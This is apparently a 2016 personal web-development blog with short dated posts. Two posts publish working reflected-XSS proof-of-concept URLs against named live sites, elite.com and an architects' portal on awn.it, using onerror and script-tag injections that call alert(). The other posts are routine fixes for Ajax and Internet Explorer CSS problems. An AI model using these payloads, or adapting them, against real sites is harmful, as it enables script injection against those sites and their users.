Monday, 27 June 2016

http://www.elite.com/ | XSS problems

Simple XSS

 http://www.elite.com/?s=%3C%2Fh3%3E%3Cvideo%3E%3Csource+onerror%3D%22alert(%27XSS%27)%22%3E%3C%2Fsource%3E%3C%2Fvideo%3E%3Ch3%3E

http://www.elite.com/?s=%3C%2Fh3%3E%3Cvideo%3E%3Csource+onerror%3D%22document.write%28%27XSS%27%29%22%3E%3C%2Fsource%3E%3C%2Fvideo%3E%3Ch3%3E

Monday, 20 June 2016

[FIX] Ajax connection - Generic error with status code 0

In most cases the problem is quite is simple:
open your page from a specific url instead of opening it from a local path

For ex. Connect to http://localhost/yourpage.html instead of  file:///C:/yourpath/yourpage.html

 

Tuesday, 7 June 2016

ordine architetti awn.it | xss

https://imateria.awn.it/se/architettibn/esegui_autenticazione?rol=corsi_iscrizione%22%3E%20%3Cscript%3Ealert%28%27http://trueliarx.blogspot.com%27%29;%3C/script%3E%20%3C%22

Thursday, 2 June 2016

Fix background Image cover on Internet Explorer

Use the following CSS



filter: progid:DXImageTransform.Microsoft.AlphaImageLoader(src='.backgroundimage.jpg', sizingMethod='scale');
-ms-filter: "progid:DXImageTransform.Microsoft.AlphaImageLoader(src='
backgroundimage.jpg', sizingMethod='scale')";



ALERT: If you have random problems like dead links and similar use a fixed 100% (height and width) div container instead of html or body.